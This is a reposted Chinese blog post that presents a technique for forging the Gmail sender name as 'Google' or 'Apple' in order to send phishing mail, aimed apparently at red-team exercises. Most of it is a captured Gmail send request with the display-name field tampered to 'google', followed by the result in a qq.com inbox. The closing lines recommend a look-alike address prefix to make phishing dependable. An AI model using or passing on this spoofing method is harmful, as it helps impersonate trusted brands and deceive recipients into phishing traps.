绕过Gmail授权伪造官方发送钓鱼邮件

绕过Gmail授权伪造官方发送钓鱼邮件
2022-3-11 09:30:0 Author: mp.weixin.qq.com(查看原文) 阅读量:68 收藏

文章来源： 辛巴大佬

各位绿帽小伙伴们，听说hvv快到了，钓鱼的日子也快来了，今天给大家带了gmail钓鱼的方法。

因为谷歌的一些限制，我们注册的时候，并不能注册一些特殊用户名，比如加入特殊字符和注册Google等等，

但是可以通过绕过谷歌限制，将邮件发送人的名字准确的改为：“Google” “Apple”等等官方。

概念证明：

绕过限制：

在发送邮件的时候抓包。

POST /sync/u/0/i/s?hl=zh-CN&c=22 HTTP/2Host: mail.google.comCookie: COMPASS=x x x x x x x x x x x x x x x x x x x x x x x x xContent-Length: 656Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"X-Framework-Xsrf-Token: xxxxxxxxxxxxxxxxxxxxxSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36Content-Type: application/jsonX-Google-Btd: 1X-Gmail-Btai: {"3":{"6":0,"10":1,"13":1,"15":0,"16":1,"17":1,"18":0,"19":1,"22":1,"23":1,"24":1,"25":1,"26":1,"27":1,"28":1,"29":0,"30":1,"31":1,"32":1,"33":1,"34":1,"35":0,"36":1,"37":"zh-CN","38":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36","39":1,"40":0,"41":25,"43":0,"44":1,"45":0,"46":1,"47":1,"48":1,"49":1,"50":1,"52":1,"53":1,"54":0,"55":1,"56":1,"57":0,"58":0,"60":0,"61":1,"62":0,"63":1,"64":1,"66":1,"67":1,"69":1,"70":0,"71":1,"72":0,"73":1},"5":"cef43d678f","7":25,"8":"gmail.pinto-server_20220225.06_p1","9":1,"10":5,"11":"","12":28800000,"13":"+08:00","14":1,"16":431522263,"17":"","18":"","19":"xxxxxxxxxxxxxxx","21":"11874"}Sec-Ch-Ua-Platform: "macOS"Accept: */*Origin: https://mail.google.comX-Client-Data: xxxxxxxxxxxxxxxxxxxSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mail.google.com/mail/u/0/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
{"2":{"1":[{"1":"5","2":{"1":"thread-a:r-xxxxxxxxxxx","2":{"14":{"1":{"1":"msg-a:r-xxxxxxxxxxx","2":{"1":1,"2":"[email protected]","3":"google","10":"[email protected]"},"3":[{"1":1,"2":"收件人@qq.com"}],"7":"xxxxxx","8":"hack by xinba","9":{"2":[{"1":0,"2":"<div dir=\"ltr\">1234</div>"}],"7":1},"11":["^all","^pfg","^f_bt","^f_btns","^f_cl","^a"],"18":"xxxxxxxxxxx","36":{"6":0},"37":{"4":0},"42":0,"43":{"1":0,"2":0,"3":0,"4":0},"52":"s:xxxxxxxxx|#msg-a:r-952505133084427487|0"},"3":1}}}}]},"3":{"1":1,"2":"11874","5":{"2":0},"7":1},"4":{"1":"xxxxxxxx","2":1,"3":"xxxxxxxxx","4":1,"5":70},"5":2}

看看效果，对比一下真实的Apple和QQ阅读的邮件，顺便说一句，我用的qq邮件接收的，最上面的Google是我们刚刚伪造发送的邮件。

在重新注册一个email邮箱，在邮箱的前缀上面做点文章，钓鱼稳当可靠。

谢谢各位，如果还想看到以后的更新，请大家点点关注。

精彩推荐

多一个点在看

多一条小鱼干

文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650535039&idx=1&sn=b2a80e9e196f2c383a2c42ca9f60504f&chksm=83ba919bb4cd188d5f4abbee5b037040ec0e5e15c3b2c48def99c07d0334370698e4f50fca36#rd
如有侵权请联系:admin#unsafe.sh